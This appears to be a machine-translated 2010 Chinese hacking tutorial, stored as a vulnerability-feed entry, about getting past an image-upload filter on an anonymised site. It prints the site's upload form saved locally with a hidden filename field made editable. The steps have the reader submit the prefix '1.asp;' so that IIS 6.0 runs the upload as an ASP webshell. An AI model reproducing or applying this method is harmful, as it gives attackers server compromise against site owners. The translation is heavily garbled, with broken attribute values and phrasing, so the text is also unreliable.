Upload vulnerabilities hidden to text breakthrough hand-vulnerability warning-the black bar safety net

2010-03-11T00:00:00
ID MYHACK58:62201026395
Type myhack58
Reporter 佚名
Modified 2010-03-11T00:00:00

Description

Article author:udb311

This article is by a upload the page break upload, saying at the time the group where talking about. Issued XXX website upload address, research over research in the past. Didn't find the breakthrough, the local modify the upload submission is still not a breakthrough.

Just at that time, the small hairy gay proposed modifying the hidden to text using IIS vulnerability may depend webshell。 We also tried this tricks how to

Local configuration upload

<! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <LINK href="../css/css. css" rel=stylesheet type=text/css> <title>Upload picture</title> </head>

<body leftmargin="0" topmargin="0"> <table width="1 0 0%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="2 0" align="center">

</td> </tr> </table> <table width="9 0%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#9 9 9 9 9 9"> <form action="<http://xxx.net/inn/upfilesave.asp>" method="post" enctype="multipart/form-data">

<tr> <td bgcolor="#FFFFFF"><table width="1 0 0%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="2 5" bgcolor="#CCCCCC" class="td_14">Upload picture</td> </tr> </table></td> </tr> <tr> <td height="3 5" align="center" bgcolor="#FFFFFF"> <input name="image" type="file" id="image"> </td> </tr> <tr> <td height="3 5" align="center" bgcolor="#FFFFFF"> <input type="submit" name="Submit" value="submit" > <input name="PathFolder" type="hidden" id="PathFolder" value="/img/trade/"> <input name="FormName" type="hidden" id="FormName" value="add"> <input name="parent" type="hidden" id="parent" value="img"> <input name="Filename_Pre" type="text" id="Filename_Pre" value=""> <input name="Create" type="hidden" id="Create" value=""> <input type="reset" name="Submit2" value="close" > </td> </tr> </form> </table> </body> </html> <script language=javascript> function checkImage(sId) { if(( document. all[sId]. value. indexOf(". asp") == -1) && (document. all[sId]. value. indexOf(". asa") == -1)) { //alert("please select a gif or jpg Image File"); // the event. returnValue = false; } } </script> Save as HTML.... and

The original

<input name="Filename_Pre" type="hidden" id="Filename_Pre" value="">

Modify

<input name="Filename_Pre" type="text" id="Filename_Pre" value="">

Open the local HTML submit page, and upload when filling 1. asp; of.

Success returns 1. asp;_201036165716.jpg the. IIS 6.0, the success of the running pony~